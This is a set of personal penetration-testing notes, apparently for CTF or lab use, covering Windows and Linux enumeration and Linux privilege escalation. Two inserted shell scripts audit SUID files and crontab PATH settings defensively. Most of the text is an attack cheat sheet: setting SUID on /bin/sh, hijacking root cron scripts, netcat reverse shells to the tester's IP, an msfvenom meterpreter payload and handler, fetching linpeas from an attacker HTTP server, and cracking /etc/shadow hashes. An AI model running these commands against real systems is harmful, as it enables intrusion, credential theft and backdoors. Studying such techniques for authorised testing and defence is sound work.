### Manual Enumeration
- processes-services :
#Windows
tasklist /svc
#Linux
ps aux
- About-version :
#Windows
systeminfo | findstr /i /c:"OS Name" /c:"OS Version" /c:"System Type"
#Linux
uname -a || cat /etc/issue
- Enum-Host_Name :
#Windows & Linux
hostname
- Enum-Users :
#Windows
whoami || net user || net user <username>
#Linux
whoami || id || cat /etc/passwd
- Open Ports :
#Windows
ipconfig /all || route print || netstat -ano
#Linux
ip a || ifconfig || ss -anp || /sbin/route || netstat -anp
- Linux
iptables
⇒ However, depending on how the firewall is configured, we may be able to glean information about the rules as a standard user || /etc/iptables
- Windows
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
Scheduled task :
1. nano test.sh (contents: chmod u+s /bin/sh)
2. chmod +x test.sh
3. nano /etc/crontab and add the line:
   * * * * * root /home/luka/test.sh
4. once the job has run: $ /bin/sh -p
5. $ whoami
in windows
schtasks /query /fo LIST /v
for Windows :
- wmic product get name, version, vendor
- wmic qfe get Caption, Description, HotFixID, InstalledOn
for Linux
dpkg -l
- for windows
- exec tool like ⇒ accesschk
c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Program Files"
- powershell script :
>Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
- for linux
find / -writable -type d 2>/dev/null
- Windows
mountvol
- Linux
mount
- Windows
driverquery.exe /v /fo csv | ConvertFrom-Csv | Select-Object 'Display Name', 'Start Mode', Path
- Linux
1. lsmod
2. modinfo <modulename>
====================================
Runas escalation via ⇒ CVE-2019-1388
====================================
- for upgrade shell
SHELL=/bin/bash script -q /dev/null
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo && fg
reset
export TERM=xterm-256color
# upload linpeas
⇒ in your terminal:
sudo python3 -m http.server 1234
⇒ on the victim machine:
curl 10.10.16.15:1234/linpeas.sh >> linpeas
chmod u+s /bin/sh
- www-data ⇒ data bases
- to compile C files:
$ gcc <file-name> -o <name>
$ whoami
-----
## sudo without passwd
$ sudo -l
i.e. which things I can run with sudo without it asking for a password
#if /usr/bin/env then :
$ sudo /usr/bin/env /bin/bash
-----
## Kernel version vulns
$ uname -a
$searchsploit <linux kernel version>
-----
## SUID Perm
$ find / -perm -4000 2>/dev/null
$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -type f -perm -04000 -ls 2>/dev/null
$ find / -type f -perm -u=s 2>/dev/null | xargs ls -l
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \;
EX >> -rws... root /bin/nmap ⇒ runs with root perms
$nmap --interactive
nmap> !whoami
if root
nmap> !nc -n <my-ip> <port> -e /bin/bash
https://vk9-sec.com/nmap-privilege-escalation
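The defender's side of the SUID listing above is to compare the find output against what the host is supposed to have, so an unexpected "rws" binary (the nmap case) stands out. The following is an added example, not part of the original notes: it uses only POSIX find/sort/comm, and the demo tree, file names and baseline list are constructed stand-ins for a real filesystem.

```shell
#!/bin/sh
# Added example (not from the original notes): audit SUID binaries against a
# baseline allowlist so an unexpected SUID file is reported.

# List regular files with the SUID bit set under a root directory, sorted.
find_suid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
}

# Print SUID files under $1 that are NOT listed in the baseline file $2
# (one absolute path per line). Whatever is printed is unexpected.
suid_not_in_baseline() {
    sort "$2" > "$2.sorted"
    find_suid "$1" | comm -23 - "$2.sorted"
    rm -f "$2.sorted"
}

# --- constructed demo tree (stands in for a real filesystem) ---
DEMO_ROOT="$(mktemp -d)"
mkdir -p "$DEMO_ROOT/usr/bin"
printf '#!/bin/sh\n' > "$DEMO_ROOT/usr/bin/passwd"   # expected SUID binary
printf '#!/bin/sh\n' > "$DEMO_ROOT/usr/bin/nmap"     # unexpected SUID binary
printf '#!/bin/sh\n' > "$DEMO_ROOT/usr/bin/ls"       # not SUID at all
chmod 4755 "$DEMO_ROOT/usr/bin/passwd" "$DEMO_ROOT/usr/bin/nmap"
chmod 755  "$DEMO_ROOT/usr/bin/ls"

# Baseline: what the administrator expects to be SUID on this host (constructed).
BASELINE="$DEMO_ROOT/suid.baseline"
printf '%s\n' "$DEMO_ROOT/usr/bin/passwd" > "$BASELINE"

# Usage: anything printed here deserves investigation.
suid_not_in_baseline "$DEMO_ROOT" "$BASELINE"
# prints: $DEMO_ROOT/usr/bin/nmap
```

On a real host the baseline would be generated once from a known-good build (find_suid / > suid.baseline) and the comparison run from a scheduled job or a file-integrity tool; the point is that the SUID set is small and stable, so any drift is worth an alert.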
-----
#crontab file => which run every <s-time>
/etc/crontab
##i can use that to do backdoor
-----
sudo -u#-1 /bin/bash
If you have write permissions on any folder inside the PATH
variable you may be able to hijacking some libraries or binaries:
echo $PATH
Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
For example, inside /etc/crontab you can find the PATH: PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
(Note how the user "user" has write privileges over /home/user)
If inside this crontab the root user executes some command or script without an absolute path, for example: * * * * * root overwrite.sh then you can get a root shell by using:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
If you can modify a cron script executed by root, you can get a shell very easily:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p
If the script executed by root uses a directory where you have full access, maybe it could be useful to delete that folder and create a symlink folder to another one serving a script controlled by you
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
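Both of the conditions described above (a writable directory on the crontab's PATH, and a root job that names its command without an absolute path) can be checked for in one pass, which is the check an administrator would run against /etc/crontab. This is an added example, not from the original notes or from the source they quote: it assumes POSIX sh, awk, sed and find (with -maxdepth), and the crontab it audits is a constructed sample, not a real system file.

```shell
#!/bin/sh
# Added example (not from the original notes): audit a crontab-format file for
# (1) PATH entries a non-root user could write to or create, and
# (2) jobs whose command is not an absolute path and is therefore
#     resolved through that PATH.

# Directories listed on the crontab's PATH= line, one per line.
cron_path_dirs() {
    sed -n 's/^PATH=//p' "$1" | tr ':' '\n'
}

# "user command" for every job whose command does not start with '/'.
# System crontab layout: min hour dom mon dow user command...
cron_relative_commands() {
    awk '
        /^[[:space:]]*#/            { next }   # comment line
        NF == 0                     { next }   # blank line
        /^[A-Za-z_][A-Za-z0-9_]*=/  { next }   # SHELL=, PATH=, MAILTO=...
        NF >= 7 && $7 !~ /^\//      { print $6, $7 }
    ' "$1"
}

# Returns 0 (true) when a PATH directory is risky: missing (so it could be
# created), owned by a non-root user, or group-/world-writable.
path_dir_is_risky() {
    [ -d "$1" ] || return 0
    find "$1" -maxdepth 0 \( ! -user root -o -perm -0020 -o -perm -0002 \) \
        -print | grep -q .
}

# Report both findings for one crontab file.
audit_crontab() {
    cron_path_dirs "$1" | while read -r d; do
        if path_dir_is_risky "$d"; then
            echo "RISKY PATH DIR: $d"
        fi
    done
    cron_relative_commands "$1" | while read -r user cmd; do
        echo "RELATIVE COMMAND (resolved via PATH) run as $user: $cmd"
    done
}

# --- constructed sample crontab (not a real system file) ---
SAMPLE_CRONTAB="$(mktemp)"
cat > "$SAMPLE_CRONTAB" <<'EOF'
# constructed sample for audit_crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*   *  * * *   root   overwrite.sh
*/5 *  * * *   root   /usr/local/bin/backup.sh
EOF

# Usage: run against the sample; on a live host point it at /etc/crontab
# and the files under /etc/cron.d.
audit_crontab "$SAMPLE_CRONTAB"
```

The fix on the defender's side follows from the output: keep PATH in system crontabs limited to root-owned, non-writable directories, and write every job's command as an absolute path so PATH resolution never enters into it.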
#######
#!/bin/bash
# if this file runs as root I can get a shell as root :D
nc -n <ip> <port> -e /bin/bash
#for upgrade with meterpreter
# to create reverse shell file
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<my ip> LPORT=<rand port> -f elf > shell.elf
# send shell.elf to the victim machine
#in my terminal
$ msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x64/meterpreter/reverse_tcp
msf> set lhost <my ip>
msf> set lport <my rand port>
msf> exploit
# on the victim machine run the shell file
#to get reverse shell in meterpreter
#to turn the meterpreter to shell
meterpreter> shell
shell# exit
meterpreter> help
exploits:
- kernel exploits: ⇒ vulns in the running kernel version ... EX. (Dirty COW)
- stored passwords (config files)
- stored passwords (History) .. /.bash_history
- weak permissions ⇒ readable /etc/shadow ⇒ unshadow passwd shadow > output.txt ⇒ crack:
$ hashcat -m 1800 output.txt rockyou.txt -O
- ssh keys —→ find / -name id_rsa 2> /dev/null
- shell escaping ⇒sudo -l
- sudo abusing intended functionality
⇒ sudo apache2 -f /etc/shadow ⇒ root hash (printed in the error message) ⇒ echo '[ root hash ]' > x.txt
$ john --wordlist=/usr/share/wordlists/nmap.lst x.txt
- sudo (LD_PRELOAD)